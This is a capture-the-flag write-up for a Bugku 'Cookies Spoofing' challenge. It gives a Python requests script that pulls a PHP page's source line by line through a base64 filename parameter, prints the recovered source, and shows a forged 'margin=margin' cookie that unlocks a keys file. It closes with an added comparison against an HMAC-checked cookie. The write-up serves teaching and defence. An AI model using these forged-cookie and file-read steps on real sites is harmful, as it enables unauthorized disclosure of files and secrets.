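WP-Bugku-Cookies Spoofing

About Python requests.Session()

First, notice that the URL contains a base64-encoded value.
Decoded, it is keys.txt.

The URL parameter line makes the server return the file one line at a time.
Based on a script found online: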

import requests

s = requests.Session()
url = 'http://120.24.86.145:8002/web11/index.php'
for i in range(1, 20):
    # 'aW5kZXgucGhw' is base64 for index.php; the file is fetched one line per request
    payload = {'line': str(i), 'filename': 'aW5kZXgucGhw'}
    a = s.get(url, params=payload).content
    content = str(a, encoding="utf-8")
    print(content)

This returns the source code:

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

Capture the request with Burp Suite and craft a new one:
Set Cookie: margin=margin
Note that the keys.txt argument after filename must be base64-encoded

Result: KEY{key_keys}
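
The cookie check in the source above trusts a value the client chooses. The following added example (not from the original post or the challenge) models that check in Python beside a variant that only accepts a cookie carrying an HMAC the server can verify; FILES, SERVER_KEY, issue_token and the auth cookie name are assumptions made for illustration.

```python
import base64
import hashlib
import hmac

FILES = {  # constructed stand-ins for the files on the server
    "keys.txt": ["public line\n"],
    "index.php": ["<?php\n", "error_reporting(0);\n"],
    "keys.php": ["<?php $key = 'PLACEHOLDER'; ?>\n"],
}
SERVER_KEY = b"constructed-demo-key"  # assumption: secret held only by the server


def read_line(filename_b64, line, allowed):
    """Shared logic of index.php: decode filename, check allowlist, return one line."""
    try:
        name = base64.b64decode(filename_b64, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return ""
    if name not in allowed:
        return ""
    lines = FILES[name]
    return lines[line] if 0 <= line < len(lines) else ""


def vulnerable(filename_b64, line, cookies):
    """Mirrors the page's check: any client sending margin=margin unlocks keys.php."""
    allowed = ["keys.txt", "index.php"]
    if cookies.get("margin") == "margin":
        allowed.append("keys.php")
    return read_line(filename_b64, line, allowed)


def issue_token(user):
    """Hypothetical helper: the server calls this only after real authentication."""
    mac = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"


def hardened(filename_b64, line, cookies):
    """keys.php is unlocked only by a cookie whose HMAC verifies under SERVER_KEY."""
    allowed = ["keys.txt", "index.php"]
    user, _, mac = cookies.get("auth", "").rpartition(".")
    expected = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
    if user and hmac.compare_digest(mac.encode(), expected.encode()):
        allowed.append("keys.php")
    return read_line(filename_b64, line, allowed)
```

Even with a verifiable cookie, keeping index.php in the allowlist discloses the check itself, so the script's own source should not be servable through this endpoint.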
